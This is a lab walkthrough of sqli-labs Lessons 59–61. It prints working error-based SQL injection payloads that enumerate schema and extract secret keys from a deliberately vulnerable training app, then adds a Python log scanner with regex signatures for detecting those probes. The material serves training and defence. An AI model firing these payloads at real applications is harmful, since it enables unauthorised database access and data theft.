Lesson-59
This challenge is a numeric GET injection; it can be exploited with error-based injection, boolean-based blind injection, or time-based blind injection.
id=1'
The target SQL statement is as follows:
if($_POST['reset']):
    setcookie('challenge',' ',time()-3600000);
else:
    if($_COOKIE['challenge']):
        $sessid=$_COOKIE['challenge'];
    else:
        $expire = time()+60*60*24*30;
        $hash = data($table,$col);
        setcookie("challenge", $hash, $expire);
    if($_GET['id']):
        $id=$_GET['id'];
        next_tryy()>=($times+1)
        $sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
        if true:
            $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
            $pass = array_reverse($unames);
            output the query result;
        else:
            print_r(mysql_error());
Note: this challenge is exploited the same way as Lesson 58; only the concatenation changes from single quotes to a bare number.
Use error-based injection to confirm the injection point
id=1--+
Query basic information
id=1 and (select count(*) from information_schema.tables group by concat((select user()),0x7e,floor(rand(0)*2)))--+
id=1 and (select count(*) from information_schema.tables group by concat((select version()),0x7e,floor(rand(0)*2)))--+
id=1 and (select count(*) from information_schema.tables group by concat((select database()),0x7e,floor(rand(0)*2)))--+
Query table names
id=1 and (select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)))--+
Query column names
id=1 and (select count(*) from information_schema.tables group by concat((select column_name from information_schema.columns where table_name='x1qk033kut' limit 2,1),0x7e,floor(rand(0)*2)))--+
Query the key information
id=1 and (select count(*) from information_schema.tables group by concat((select secret_9MWT from x1qk033kut limit 0,1),0x7e,floor(rand(0)*2)))--+
Successfully obtained the key: LtSOIKqX4EC5zCPwOzc6NFS7
Note that the table and column names are different each time; update them promptly to retrieve the specific information.
Lesson-60
This challenge is a GET injection inside parentheses and double quotes, i.e. ("..."); it can be exploited with error-based injection, boolean-based blind injection, or time-based blind injection.
id=1'
The target SQL statement is as follows:
if($_POST['reset']):
    setcookie('challenge',' ',time()-3600000);
else:
    if($_COOKIE['challenge']):
        $sessid=$_COOKIE['challenge'];
    else:
        $expire = time()+60*60*24*30;
        $hash = data($table,$col);
        setcookie("challenge", $hash, $expire);
    if($_GET['id']):
        $id=$_GET['id'];
        $id ='("'.$id.'")';
        next_tryy()>=($times+1)
        $sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
        if true:
            $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
            $pass = array_reverse($unames);
            output the query result;
        else:
            print_r(mysql_error());
Note: this challenge is exploited the same way as Lesson 58; only the concatenation changes from single quotes to parentheses with double quotes.
Use error-based injection to confirm the injection point
id=1")--+
Query basic information
id=1") and (select count(*) from information_schema.tables group by concat((select user()),0x7e,floor(rand(0)*2)))--+
id=1") and (select count(*) from information_schema.tables group by concat((select version()),0x7e,floor(rand(0)*2)))--+
id=1") and (select count(*) from information_schema.tables group by concat((select database()),0x7e,floor(rand(0)*2)))--+
Query table names
id=1") and (select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)))--+
Query column names
id=1") and (select count(*) from information_schema.tables group by concat((select column_name from information_schema.columns where table_name='bc8q88rlor' limit 2,1),0x7e,floor(rand(0)*2)))--+
Query the key information
id=1") and (select count(*) from information_schema.tables group by concat((select secret_DAAH from bc8q88rlor limit 0,1),0x7e,floor(rand(0)*2)))--+
Successfully obtained the key: O8c2mJWO68hDxl7cAPYNpElM
Note that the table and column names are different each time; update them promptly to retrieve the specific information.
Lesson-61
This challenge is a GET injection inside double parentheses and single quotes, i.e. (('...')); it can be exploited with error-based injection, boolean-based blind injection, or time-based blind injection.
id=1'
The target SQL statement is as follows:
if($_POST['reset']):
    setcookie('challenge',' ',time()-3600000);
else:
    if($_COOKIE['challenge']):
        $sessid=$_COOKIE['challenge'];
    else:
        $expire = time()+60*60*24*30;
        $hash = data($table,$col);
        setcookie("challenge", $hash, $expire);
    if($_GET['id']):
        $id=$_GET['id'];
        next_tryy()>=($times+1)
        $sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
        if true:
            $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
            $pass = array_reverse($unames);
            output the query result;
        else:
            print_r(mysql_error());
Note: this challenge is exploited the same way as Lesson 58; only the concatenation changes from single quotes to double parentheses with single quotes.
Use error-based injection to confirm the injection point
id=1'))--+
Query basic information
id=1')) and (select count(*) from information_schema.tables group by concat((select user()),0x7e,floor(rand(0)*2)))--+
id=1')) and (select count(*) from information_schema.tables group by concat((select version()),0x7e,floor(rand(0)*2)))--+
id=1')) and (select count(*) from information_schema.tables group by concat((select database()),0x7e,floor(rand(0)*2)))--+
Query table names
id=1')) and (select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)))--+
Query column names
id=1')) and (select count(*) from information_schema.tables group by concat((select column_name from information_schema.columns where table_name='upre7krqfg' limit 2,1),0x7e,floor(rand(0)*2)))--+
Query the key information
id=1')) and (select count(*) from information_schema.tables group by concat((select secret_EX6I from upre7krqfg limit 0,1),0x7e,floor(rand(0)*2)))--+
Successfully obtained the key: 6lB7uSQQDKE96ZNcXEDiREHG
Note that the table and column names are different each time; update them promptly to retrieve the specific information.
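The three lessons above differ only in the closing sequence (a bare number, ") or ')) ) and otherwise reuse the same error-based technique: a GROUP BY over concat(..., floor(rand(0)*2)) that forces a duplicate-entry error, with the server echoing mysql_error(). As an added example from the defender's side (this is not code from the original write-up or from sqli-labs), the Python script below scans web server access-log lines for exactly that pattern. It URL-decodes each query parameter, strips all whitespace so that the space-less variants shown on this page still match, flags the GROUP BY / floor(rand(0)*2) and information_schema signatures, and records which of the three quoting contexts the request tried to break out of. The log lines, client addresses and paths are constructed for the example.

```python
"""Spot error-based SQL injection probes in an access log.

Added example for Lessons 59-61; not part of the original write-up.
The log lines, IP addresses and paths below are constructed.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Signatures of the technique used on this page: a GROUP BY over
# concat(..., floor(rand(0)*2)) (the duplicate-entry trick), reads from
# information_schema, and a trailing SQL comment.  Matching runs on
# whitespace-stripped, lowercased text, so "selectcount(*)from" variants
# match just like the spaced form.
_SIGNATURES = {
    "dup_entry_rand_groupby": re.compile(r"groupby.*floor\(rand\(0\)\*2\)"),
    "information_schema_probe": re.compile(r"information_schema\.(tables|columns)"),
    "comment_terminator": re.compile(r"(--|#)$"),
}

# Closing sequences for the three quoting contexts covered by the lessons:
# numeric (Lesson 59), ("...") (Lesson 60) and (('...')) (Lesson 61).
_BREAKOUTS = [
    ("numeric", re.compile(r"^\d+(and|or)\b")),
    ("paren_dquote", re.compile(r'^\d+"\)')),
    ("double_paren_squote", re.compile(r"^\d+'\)\)")),
]


def normalise(value):
    """URL-decode (twice, to catch double encoding), drop all whitespace, lowercase."""
    decoded = unquote_plus(unquote_plus(value))
    return re.sub(r"\s+", "", decoded).lower()


def analyse_query(query):
    """Classify one URL query string.

    Returns {"suspicious": bool, "signatures": [...], "breakout": str or None}.
    A request counts as suspicious only when a technique signature matched,
    not merely because a parameter happened to end in a comment marker.
    """
    signatures = set()
    breakout = None
    for values in parse_qs(query, keep_blank_values=True).values():
        for raw in values:
            norm = normalise(raw)
            for label, rx in _SIGNATURES.items():
                if rx.search(norm):
                    signatures.add(label)
            for label, rx in _BREAKOUTS:
                if rx.match(norm):
                    breakout = label
    suspicious = bool(signatures & {"dup_entry_rand_groupby", "information_schema_probe"})
    return {"suspicious": suspicious, "signatures": sorted(signatures), "breakout": breakout}


# Common Log Format prefix: client ident user [time] "METHOD target HTTP/x"
_REQ_RX = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def scan_log(lines):
    """Return (client_ip, path, analysis) for every suspicious request in the log."""
    hits = []
    for line in lines:
        m = _REQ_RX.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        result = analyse_query(parts.query)
        if result["suspicious"]:
            hits.append((client, parts.path, result))
    return hits


# Constructed sample log, modelled on the payload shapes shown in the write-up.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /Less-59/?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /Less-59/?id=1and(selectcount(*)from%20information_schema.tablesgroupby%20concat((selectuser()),0x7e,floor(rand(0)*2)))--+ HTTP/1.1" 200 640',
    '10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /Less-60/?id=1%22)%20and%20(select%20count(*)%20from%20information_schema.tables%20group%20by%20concat((select%20version()),0x7e,floor(rand(0)*2)))--+ HTTP/1.1" 200 640',
    '10.0.0.5 - - [01/Jan/2024:12:00:03 +0000] "GET /Less-61/?id=1%27))%20and%20(select%20count(*)%20from%20information_schema.tables%20group%20by%20concat((select%20database()),0x7e,floor(rand(0)*2)))--+ HTTP/1.1" 200 640',
    '10.0.0.9 - - [01/Jan/2024:12:00:04 +0000] "GET /Less-59/?id=42&page=2 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for client, path, result in scan_log(SAMPLE_LOG):
        print(f"{client} {path} breakout={result['breakout']} signatures={result['signatures']}")
```

Run against the constructed log, the script reports the three probe lines and stays silent on the two ordinary requests. Matching on whitespace-stripped text is the important design choice: the page itself shows the same payload both with and without spaces, and a filter keyed on "group by" with a literal space would miss the compact form.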